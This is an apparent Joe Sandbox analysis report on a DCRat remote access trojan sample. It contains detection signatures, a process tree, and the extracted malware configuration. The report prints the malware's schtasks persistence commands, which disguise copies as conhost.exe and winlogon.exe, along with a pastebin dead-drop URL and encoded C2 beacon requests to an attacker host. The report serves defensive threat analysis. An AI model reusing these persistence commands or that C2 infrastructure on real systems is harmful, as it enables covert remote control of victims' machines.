Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
QIKiV83Pkl.exe

Overview

General Information

Sample name:QIKiV83Pkl.exe
renamed because original name is a hash value
Original sample name:2c00ebc767b339c3baf6bcf3086edf51.exe
Analysis ID:1483416
MD5:2c00ebc767b339c3baf6bcf3086edf51
SHA1:fd1aac21bf1604a175e1d87fa174d832503e3a79
SHA256:67e022273972cda8e1633f002043e4f03cc62bf603bfc95dd5c78af8c0cfb5d2
Tags:DCRatexe
Infos:

Detection

DCRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Yara detected DCRat
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Creates processes via WMI
Drops PE files to the user root directory
Drops executable to a common third party application directory
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspicious Program Location with Network Connections
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • QIKiV83Pkl.exe (PID: 7132 cmdline: "C:\Users\user\Desktop\QIKiV83Pkl.exe" MD5: 2C00EBC767B339C3BAF6BCF3086EDF51)
    • wscript.exe (PID: 5392 cmdline: "C:\Windows\System32\WScript.exe" "C:\brokermonitordhcp\NKrhHlHeQ28n8tUMpitEGWra.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 5780 cmdline: C:\Windows\system32\cmd.exe /c ""C:\brokermonitordhcp\2sqRykCed6LZLP.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • portruntime.exe (PID: 3212 cmdline: "C:\brokermonitordhcp\portruntime.exe" MD5: DE91A616A55A97BB434BC118AF3E0E7B)
          • schtasks.exe (PID: 6912 cmdline: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Users\Default\conhost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6656 cmdline: schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Default\conhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 744 cmdline: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Users\Default\conhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3088 cmdline: schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2056 cmdline: schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUs" /sc ONLOGON /tr "'C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1168 cmdline: schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3672 cmdline: schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 11 /tr "'C:\Users\jones\HuzhgkcqwYiFfxvhdfMUs.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1272 cmdline: schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUs" /sc ONLOGON /tr "'C:\Users\jones\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3020 cmdline: schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 10 /tr "'C:\Users\jones\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1848 cmdline: schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\HuzhgkcqwYiFfxvhdfMUs.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1840 cmdline: schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUs" /sc ONLOGON /tr "'C:\Users\Default User\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1888 cmdline: schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2260 cmdline: schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 5 /tr "'C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2092 cmdline: schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUs" /sc ONLOGON /tr "'C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4260 cmdline: schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 9 /tr "'C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2908 cmdline: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 13 /tr "'C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7136 cmdline: schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4708 cmdline: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6844 cmdline: schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 10 /tr "'C:\Windows\Downloaded Program Files\HuzhgkcqwYiFfxvhdfMUs.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4124 cmdline: schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUs" /sc ONLOGON /tr "'C:\Windows\Downloaded Program Files\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3628 cmdline: schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 10 /tr "'C:\Windows\Downloaded Program Files\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • cmd.exe (PID: 4016 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TpLSZl35nU.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • w32tm.exe (PID: 1180 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
            • HuzhgkcqwYiFfxvhdfMUs.exe (PID: 6572 cmdline: "C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe" MD5: DE91A616A55A97BB434BC118AF3E0E7B)
  • HuzhgkcqwYiFfxvhdfMUs.exe (PID: 1964 cmdline: "C:\Users\Default User\HuzhgkcqwYiFfxvhdfMUs.exe" MD5: DE91A616A55A97BB434BC118AF3E0E7B)
  • HuzhgkcqwYiFfxvhdfMUs.exe (PID: 1532 cmdline: "C:\Users\Default User\HuzhgkcqwYiFfxvhdfMUs.exe" MD5: DE91A616A55A97BB434BC118AF3E0E7B)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"SCRT": "{\"X\":\"(\",\"Y\":\"~\",\"B\":\">\",\"y\":\"|\",\"C\":\";\",\"v\":\"$\",\"Q\":\"@\",\"c\":\"!\",\"L\":\"*\",\"3\":\",\",\"i\":\"&\",\"M\":\"_\",\"a\":\"#\",\"o\":\".\",\"J\":\"%\",\"d\":\"<\",\"m\":\"`\",\"S\":\")\",\"e\":\"^\",\"R\":\" \",\"h\":\"-\"}", "PCRT": "{\"Z\":\">\",\"r\":\")\",\"T\":\" \",\"V\":\"*\",\"D\":\"~\",\"L\":\"^\",\"m\":\"%\",\"U\":\".\",\"b\":\"#\",\"Y\":\"-\",\"B\":\"`\",\"Q\":\"&\",\"x\":\"(\",\"1\":\"<\",\"H\":\";\",\"C\":\"$\",\"W\":\"|\",\"k\":\"!\",\"R\":\",\",\"F\":\"_\",\"0\":\"@\"}", "TAG": "", "MUTEX": "DCR_MUTEX-aA95Mrr0umnIfNKyuBZl", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "DCL": "https://pastebin.com/raw/i8wetBiv", "T": "1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000025.00000002.1628584265.0000000002861000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
    00000005.00000002.1474905892.0000000002FEC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
      00000014.00000002.1564725393.000000000356D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
        00000025.00000002.1628584265.000000000289C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
          00000005.00000002.1474905892.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
            Click to see the 7 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Execution from Suspicious Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Default User\HuzhgkcqwYiFfxvhdfMUs.exe", CommandLine: "C:\Users\Default User\HuzhgkcqwYiFfxvhdfMUs.exe", CommandLine|base64offset|contains: , Image: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe, NewProcessName: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe, OriginalFileName: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: "C:\Users\Default User\HuzhgkcqwYiFfxvhdfMUs.exe", ProcessId: 1964, ProcessName: HuzhgkcqwYiFfxvhdfMUs.exe
            Sigma detected: Files With System Process Name In Unsuspected Locations
            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\brokermonitordhcp\portruntime.exe, ProcessId: 3212, TargetFilename: C:\Users\Default\conhost.exe
            Sigma detected: Suspicious Program Location with Network Connections
            Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 172.67.19.24, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe, Initiated: true, ProcessId: 1532, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49704
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\brokermonitordhcp\NKrhHlHeQ28n8tUMpitEGWra.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\brokermonitordhcp\NKrhHlHeQ28n8tUMpitEGWra.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\QIKiV83Pkl.exe", ParentImage: C:\Users\user\Desktop\QIKiV83Pkl.exe, ParentProcessId: 7132, ParentProcessName: QIKiV83Pkl.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\brokermonitordhcp\NKrhHlHeQ28n8tUMpitEGWra.vbe" , ProcessId: 5392, ProcessName: wscript.exe

            Persistence and Installation Behavior

            barindex
            Sigma detected: Schedule system process
            Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Users\Default\conhost.exe'" /f, CommandLine: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Users\Default\conhost.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\brokermonitordhcp\portruntime.exe", ParentImage: C:\brokermonitordhcp\portruntime.exe, ParentProcessId: 3212, ParentProcessName: portruntime.exe, ProcessCommandLine: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Users\Default\conhost.exe'" /f, ProcessId: 6912, ProcessName: schtasks.exe

            Snort Signatures

            No Snort rule has matched

            Suricata Signatures

            Timestamp:2024-07-27T11:37:33.132074+0200
            SID:2034194
            Source Port:49706
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-27T11:37:33.969083+0200
            SID:2022930
            Source Port:443
            Destination Port:49705
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-27T11:38:12.236267+0200
            SID:2022930
            Source Port:443
            Destination Port:49711
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: QIKiV83Pkl.exeAvira: detected
            Antivirus detection for dropped file
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Users\user\AppData\Local\Temp\TpLSZl35nU.batAvira: detection malicious, Label: BAT/Delbat.C
            Source: C:\brokermonitordhcp\portruntime.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Users\Default\conhost.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\brokermonitordhcp\NKrhHlHeQ28n8tUMpitEGWra.vbeAvira: detection malicious, Label: VBS/Runner.VPG
            Found malware configuration
            Source: portruntime.exe.3212.5.memstrminMalware Configuration Extractor: DCRat {"SCRT": "{\"X\":\"(\",\"Y\":\"~\",\"B\":\">\",\"y\":\"|\",\"C\":\";\",\"v\":\"$\",\"Q\":\"@\",\"c\":\"!\",\"L\":\"*\",\"3\":\",\",\"i\":\"&\",\"M\":\"_\",\"a\":\"#\",\"o\":\".\",\"J\":\"%\",\"d\":\"<\",\"m\":\"`\",\"S\":\")\",\"e\":\"^\",\"R\":\" \",\"h\":\"-\"}", "PCRT": "{\"Z\":\">\",\"r\":\")\",\"T\":\" \",\"V\":\"*\",\"D\":\"~\",\"L\":\"^\",\"m\":\"%\",\"U\":\".\",\"b\":\"#\",\"Y\":\"-\",\"B\":\"`\",\"Q\":\"&\",\"x\":\"(\",\"1\":\"<\",\"H\":\";\",\"C\":\"$\",\"W\":\"|\",\"k\":\"!\",\"R\":\",\",\"F\":\"_\",\"0\":\"@\"}", "TAG": "", "MUTEX": "DCR_MUTEX-aA95Mrr0umnIfNKyuBZl", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "DCL": "https://pastebin.com/raw/i8wetBiv", "T": "1"}
            Multi AV Scanner detection for dropped file
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exeReversingLabs: Detection: 87%
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exeVirustotal: Detection: 67%Perma Link
            Source: C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exeReversingLabs: Detection: 87%
            Source: C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exeVirustotal: Detection: 67%Perma Link
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeReversingLabs: Detection: 87%
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeVirustotal: Detection: 67%Perma Link
            Source: C:\Users\Default\conhost.exeReversingLabs: Detection: 87%
            Source: C:\Users\Default\conhost.exeVirustotal: Detection: 67%Perma Link
            Source: C:\Users\jones\HuzhgkcqwYiFfxvhdfMUs.exeReversingLabs: Detection: 87%
            Source: C:\Users\jones\HuzhgkcqwYiFfxvhdfMUs.exeVirustotal: Detection: 67%Perma Link
            Source: C:\Windows\Downloaded Program Files\HuzhgkcqwYiFfxvhdfMUs.exeReversingLabs: Detection: 87%
            Source: C:\Windows\Downloaded Program Files\HuzhgkcqwYiFfxvhdfMUs.exeVirustotal: Detection: 67%Perma Link
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeReversingLabs: Detection: 87%
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeVirustotal: Detection: 67%Perma Link
            Source: C:\brokermonitordhcp\portruntime.exeReversingLabs: Detection: 87%
            Source: C:\brokermonitordhcp\portruntime.exeVirustotal: Detection: 67%Perma Link
            Multi AV Scanner detection for submitted file
            Source: QIKiV83Pkl.exeReversingLabs: Detection: 71%
            Source: QIKiV83Pkl.exeVirustotal: Detection: 59%Perma Link
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for dropped file
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exeJoe Sandbox ML: detected
            Source: C:\brokermonitordhcp\portruntime.exeJoe Sandbox ML: detected
            Source: C:\Users\Default\conhost.exeJoe Sandbox ML: detected
            Source: C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exeJoe Sandbox ML: detected
            Source: C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exeJoe Sandbox ML: detected
            Source: C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exeJoe Sandbox ML: detected
            Source: C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exeJoe Sandbox ML: detected
            Source: C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: QIKiV83Pkl.exeJoe Sandbox ML: detected
            Source: QIKiV83Pkl.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\brokermonitordhcp\portruntime.exeDirectory created: C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exeJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeDirectory created: C:\Program Files\Windows Photo Viewer\en-GB\be621495aa6c7bJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exeJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\cc11b995f2a76dJump to behavior
            Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.7:49704 version: TLS 1.2
            Source: QIKiV83Pkl.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: QIKiV83Pkl.exe
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0087A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0087A5F4
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0088B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0088B8E0
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0089AAA8 FindFirstFileExA,0_2_0089AAA8
            Source: C:\brokermonitordhcp\portruntime.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeFile opened: C:\Users\userJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeCode function: 4x nop then jmp 00007FFAAC48CCDAh21_2_00007FFAAC48CBD9

            Networking

            barindex
            Connects to a pastebin service (likely for C&C)
            Source: unknownDNS query: name: pastebin.com
            Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
            Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: global trafficHTTP traffic detected: GET /raw/i8wetBiv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: pastebin.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?70qtQaeMHcDQCRT7QXgceCi=AOtJD6&adfdd2a97725e2297c7729eabf3b0f6c=2294d62f1ddc0f5e58e782c9a89a4ec0&69876eca3183c1643eda5600faec3e2b=QNzcDO5UjZygDZkRWYiRWMwUTZ1IjNhJDNmFTYjJWZ5MzMwEWO3kjZ&70qtQaeMHcDQCRT7QXgceCi=AOtJD6 HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: romangw5.beget.techConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?70qtQaeMHcDQCRT7QXgceCi=AOtJD6&adfdd2a97725e2297c7729eabf3b0f6c=2294d62f1ddc0f5e58e782c9a89a4ec0&69876eca3183c1643eda5600faec3e2b=QNzcDO5UjZygDZkRWYiRWMwUTZ1IjNhJDNmFTYjJWZ5MzMwEWO3kjZ&70qtQaeMHcDQCRT7QXgceCi=AOtJD6 HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: romangw5.beget.tech
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /raw/i8wetBiv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: pastebin.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?70qtQaeMHcDQCRT7QXgceCi=AOtJD6&adfdd2a97725e2297c7729eabf3b0f6c=2294d62f1ddc0f5e58e782c9a89a4ec0&69876eca3183c1643eda5600faec3e2b=QNzcDO5UjZygDZkRWYiRWMwUTZ1IjNhJDNmFTYjJWZ5MzMwEWO3kjZ&70qtQaeMHcDQCRT7QXgceCi=AOtJD6 HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: romangw5.beget.techConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?70qtQaeMHcDQCRT7QXgceCi=AOtJD6&adfdd2a97725e2297c7729eabf3b0f6c=2294d62f1ddc0f5e58e782c9a89a4ec0&69876eca3183c1643eda5600faec3e2b=QNzcDO5UjZygDZkRWYiRWMwUTZ1IjNhJDNmFTYjJWZ5MzMwEWO3kjZ&70qtQaeMHcDQCRT7QXgceCi=AOtJD6 HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: romangw5.beget.tech
            Source: global trafficDNS traffic detected: DNS query: pastebin.com
